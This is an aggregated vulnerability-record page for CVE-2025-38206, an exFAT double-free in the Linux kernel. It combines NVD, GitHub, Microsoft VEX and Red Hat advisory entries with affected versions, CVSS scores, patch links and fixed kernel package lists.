"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:6570",
"url": "https://access.redhat.com/errata/RHSA-2026:6570"
},
{
"published_at": "2026-04-08",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:7100",
"url": "https://access.redhat.com/errata/RHSA-2026:7100"
},
{
"published_at": "2026-04-08",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:6948",
"url": "https://access.redhat.com/errata/RHSA-2026:6948"
},
{
"published_at": "2026-04-08",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:6961",
"url": "https://access.redhat.com/errata/RHSA-2026:6961"
},
{
"published_at": "2026-04-06",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:6572",
"url": "https://access.redhat.com/errata/RHSA-2026:6572"
},
{
"published_at": "2026-04-08",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:7003",
"url": "https://access.redhat.com/errata/RHSA-2026:7003"
},
{
"published_at": "2026-04-08",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:6986",
"url": "https://access.redhat.com/errata/RHSA-2026:6986"
},
{
"published_at": "2026-04-08",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:6953",
"url": "https://access.redhat.com/errata/RHSA-2026:6953"
},
{
"published_at": "2026-04-06",
"title": "Bulletin de s\u00e9curit\u00e9 Red Hat RHSA-2026:6692",
"url": "https://access.redhat.com/errata/RHSA-2026:6692"
}
]
}
FKIE_CVE-2025-38206
Vulnerability from fkie_nvd - Published: 2025-07-04 14:15 - Updated: 2025-12-18 21:17| URL | Tags | ||
|---|---|---|---|
| 416baaa9-dc9f-4396-8d5f-8c081fb06d67 | https://git.kernel.org/stable/c/13d8de1b6568dcc31a95534ced16bc0c9a67bc15 | Patch | |
| 416baaa9-dc9f-4396-8d5f-8c081fb06d67 | https://git.kernel.org/stable/c/1f3d9724e16d62c7d42c67d6613b8512f2887c22 | Patch | |
| 416baaa9-dc9f-4396-8d5f-8c081fb06d67 | https://git.kernel.org/stable/c/66e84439ec2af776ce749e8540f8fdd257774152 | Patch | |
| 416baaa9-dc9f-4396-8d5f-8c081fb06d67 | https://git.kernel.org/stable/c/d3cef0e7a5c1aa6217c51faa9ce8ecac35d6e1fd | Patch | |
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.debian.org/debian-lts-announce/2025/10/msg00007.html | Mailing List, Third Party Advisory |
| Vendor | Product | Version | |
|---|---|---|---|
| linux | linux_kernel | * | |
| linux | linux_kernel | * | |
| linux | linux_kernel | * | |
| debian | debian_linux | 11.0 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0770A04F-68CB-4B08-8E99-2466EB67D7A0",
"versionEndExcluding": "5.10.239",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D96F2C0D-0D4A-4658-AD34-D8A626EA422D",
"versionEndExcluding": "5.15.186",
"versionStartIncluding": "5.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CF41C6A0-D0C0-49DF-8756-8E9A19FCC39A",
"versionEndExcluding": "6.15.4",
"versionStartIncluding": "5.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*",
"matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nexfat: fix double free in delayed_free\n\nThe double free could happen in the following path.\n\nexfat_create_upcase_table()\n exfat_create_upcase_table() : return error\n exfat_free_upcase_table() : free -\u003evol_utbl\n exfat_load_default_upcase_table : return error\n exfat_kill_sb()\n delayed_free()\n exfat_free_upcase_table() \u003c--------- double free\nThis patch set -\u003evol_util as NULL after freeing it."
},
{
"lang": "es",
"value": "En el kernel de Linux, se ha resuelto la siguiente vulnerabilidad: exfat: corrige la doble liberaci\u00f3n en delayed_free La doble liberaci\u00f3n podr\u00eda ocurrir en la siguiente ruta. exfat_create_upcase_table() exfat_create_upcase_table() : devolver error exfat_free_upcase_table() : liberar -\u0026gt;vol_utbl exfat_load_default_upcase_table : devolver error exfat_kill_sb() delayed_free() exfat_free_upcase_table() \u0026lt;--------- doble liberaci\u00f3n Este parche establece -\u0026gt;vol_util como NULL despu\u00e9s de liberarlo."
}
],
"id": "CVE-2025-38206",
"lastModified": "2025-12-18T21:17:09.210",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2025-07-04T14:15:28.703",
"references": [
{
"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"tags": [
"Patch"
],
"url": "https://git.kernel.org/stable/c/13d8de1b6568dcc31a95534ced16bc0c9a67bc15"
},
{
"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"tags": [
"Patch"
],
"url": "https://git.kernel.org/stable/c/1f3d9724e16d62c7d42c67d6613b8512f2887c22"
},
{
"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"tags": [
"Patch"
],
"url": "https://git.kernel.org/stable/c/66e84439ec2af776ce749e8540f8fdd257774152"
},
{
"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"tags": [
"Patch"
],
"url": "https://git.kernel.org/stable/c/d3cef0e7a5c1aa6217c51faa9ce8ecac35d6e1fd"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2025/10/msg00007.html"
}
],
"sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-415"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
GHSA-349Q-HP2F-R4HF
Vulnerability from github – Published: 2025-07-04 15:31 – Updated: 2025-12-18 21:31In the Linux kernel, the following vulnerability has been resolved:
exfat: fix double free in delayed_free
The double free could happen in the following path.
exfat_create_upcase_table() exfat_create_upcase_table() : return error exfat_free_upcase_table() : free ->vol_utbl exfat_load_default_upcase_table : return error exfat_kill_sb() delayed_free() exfat_free_upcase_table() <--------- double free This patch set ->vol_util as NULL after freeing it.
{
"affected": [],
"aliases": [
"CVE-2025-38206"
],
"database_specific": {
"cwe_ids": [
"CWE-415"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-07-04T14:15:28Z",
"severity": "HIGH"
},
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nexfat: fix double free in delayed_free\n\nThe double free could happen in the following path.\n\nexfat_create_upcase_table()\n exfat_create_upcase_table() : return error\n exfat_free_upcase_table() : free -\u003evol_utbl\n exfat_load_default_upcase_table : return error\n exfat_kill_sb()\n delayed_free()\n exfat_free_upcase_table() \u003c--------- double free\nThis patch set -\u003evol_util as NULL after freeing it.",
"id": "GHSA-349q-hp2f-r4hf",
"modified": "2025-12-18T21:31:33Z",
"published": "2025-07-04T15:31:09Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38206"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/13d8de1b6568dcc31a95534ced16bc0c9a67bc15"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/1f3d9724e16d62c7d42c67d6613b8512f2887c22"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/66e84439ec2af776ce749e8540f8fdd257774152"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/d3cef0e7a5c1aa6217c51faa9ce8ecac35d6e1fd"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2025/10/msg00007.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
MSRC_CVE-2025-38206
Vulnerability from csaf_microsoft - Published: 2025-07-02 00:00 - Updated: 2026-02-18 02:48| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 17084-1 | — |
| URL | Category |
|---|---|
| https://msrc.microsoft.com/csaf/vex/2025/msrc_cve… | self |
| https://support.microsoft.com/lifecycle | external |
| https://www.first.org/cvss | external |
| https://msrc.microsoft.com/csaf/vex/2025/msrc_cve… | self |
{
"document": {
"category": "csaf_vex",
"csaf_version": "2.0",
"distribution": {
"text": "Public",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en-US",
"notes": [
{
"category": "general",
"text": "To determine the support lifecycle for your software, see the Microsoft Support Lifecycle: https://support.microsoft.com/lifecycle",
"title": "Additional Resources"
},
{
"category": "legal_disclaimer",
"text": "The information provided in the Microsoft Knowledge Base is provided \\\"as is\\\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.",
"title": "Disclaimer"
}
],
"publisher": {
"category": "vendor",
"contact_details": "secure@microsoft.com",
"name": "Microsoft Security Response Center",
"namespace": "https://msrc.microsoft.com"
},
"references": [
{
"category": "self",
"summary": "CVE-2025-38206 exfat: fix double free in delayed_free - VEX",
"url": "https://msrc.microsoft.com/csaf/vex/2025/msrc_cve-2025-38206.json"
},
{
"category": "external",
"summary": "Microsoft Support Lifecycle",
"url": "https://support.microsoft.com/lifecycle"
},
{
"category": "external",
"summary": "Common Vulnerability Scoring System",
"url": "https://www.first.org/cvss"
}
],
"title": "exfat: fix double free in delayed_free",
"tracking": {
"current_release_date": "2026-02-18T02:48:53.000Z",
"generator": {
"date": "2026-02-18T11:15:53.305Z",
"engine": {
"name": "MSRC Generator",
"version": "1.0"
}
},
"id": "msrc_CVE-2025-38206",
"initial_release_date": "2025-07-02T00:00:00.000Z",
"revision_history": [
{
"date": "2025-09-03T22:31:13.000Z",
"legacy_version": "1",
"number": "1",
"summary": "Information published."
},
{
"date": "2026-02-18T02:48:53.000Z",
"legacy_version": "1.1",
"number": "2",
"summary": "Information published."
}
],
"status": "final",
"version": "2"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "3.0",
"product": {
"name": "Azure Linux 3.0",
"product_id": "17084"
}
}
],
"category": "product_name",
"name": "Azure Linux"
},
{
"category": "product_name",
"name": "azl3 kernel 6.6.96.1-1",
"product": {
"name": "azl3 kernel 6.6.96.1-1",
"product_id": "1"
}
}
],
"category": "vendor",
"name": "Microsoft"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "azl3 kernel 6.6.96.1-1 as a component of Azure Linux 3.0",
"product_id": "17084-1"
},
"product_reference": "1",
"relates_to_product_reference": "17084"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-38206",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"17084-1"
]
}
],
"notes": [
{
"category": "general",
"text": "Linux",
"title": "Assigning CNA"
}
],
"product_status": {
"known_not_affected": [
"17084-1"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-38206 exfat: fix double free in delayed_free - VEX",
"url": "https://msrc.microsoft.com/csaf/vex/2025/msrc_cve-2025-38206.json"
}
],
"title": "exfat: fix double free in delayed_free"
}
]
}
RHSA-2026:3066
Vulnerability from csaf_redhat - Published: 2026-02-23 10:50 - Updated: 2026-04-13 08:35A flaw was found in the Linux kernel. This vulnerability, known as a use-after-free (UAF), occurs in the `page_pool_recycle_in_ring` function. A local attacker could exploit this by manipulating the system's memory management, causing a freed memory region to be improperly accessed. This can lead to system instability, unauthorized access to sensitive information, or potentially allow an attacker to execute malicious code.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-64k-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-64k-core-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-64k-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-64k-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-abi-stablelists-0:5.14.0-611.35.1.el9_7.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debuginfo-common-aarch64-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debuginfo-common-ppc64le-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debuginfo-common-s390x-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debuginfo-common-x86_64-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-doc-0:5.14.0-611.35.1.el9_7.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-rt-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-rt-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-rt-64k-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-rt-64k-core-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-rt-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-rt-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-rt-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-rt-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
